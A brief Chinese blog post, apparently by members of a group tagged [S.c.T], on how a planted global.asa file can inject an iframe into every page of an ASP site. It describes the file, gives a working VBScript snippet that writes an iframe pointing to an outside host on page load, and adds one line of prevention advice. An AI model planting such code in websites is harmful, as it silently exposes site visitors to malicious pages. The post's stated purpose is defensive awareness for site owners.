SpookZanG

Moyo[S.c.T] & SpooKZanG[S.c.T]

首先声明：
一、本文毫无技术含量，高手绕道。
二、本文并非教授挂马知识，目的在于为广大站长提供一些防护思路。

一、什么是global.asa？
Global.asa 文件是一个可选的文件，它可包含可被 ASP 应用程序中每个页面访问的对象、变量以及方法的声明。

Global.asa 文件可包含下列内容：

• Application 事件
• Session 事件
• <object> 声明
• TypeLibrary 声明
• #include 命令

注释：Global.asa 文件须存放于 ASP 应用程序的根目录中，且每个应用程序只能有一个 Global.asa 文件。

通过以上信息，我们能够知道，任何一个ASP程序在执行时，都会调用global.asa，这就给我们留下了一些隐患。

二、怎样实现
只要我们在网站下面建立一个global.asa，并且写入如下内容：

1
2
3
4
5

<script LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
End Sub
Response.Write "<iframe src=http://www.spookzang.net width=220 height=220></iframe>"
</script>

这样用户在第一次打开网页的时候就会触发挂马。

三、怎样预防
注意自己网站下面的global.asa文件，是否被改写或者添加。

因为其不像iframe，JS等挂马方法，能通过查看源码得到信息。
他只需在网站根目录下建立一个global.asa，然后在里面写入挂马内容即可让整个网站被挂马，而不需要在整个网站的网页内加入挂马内容。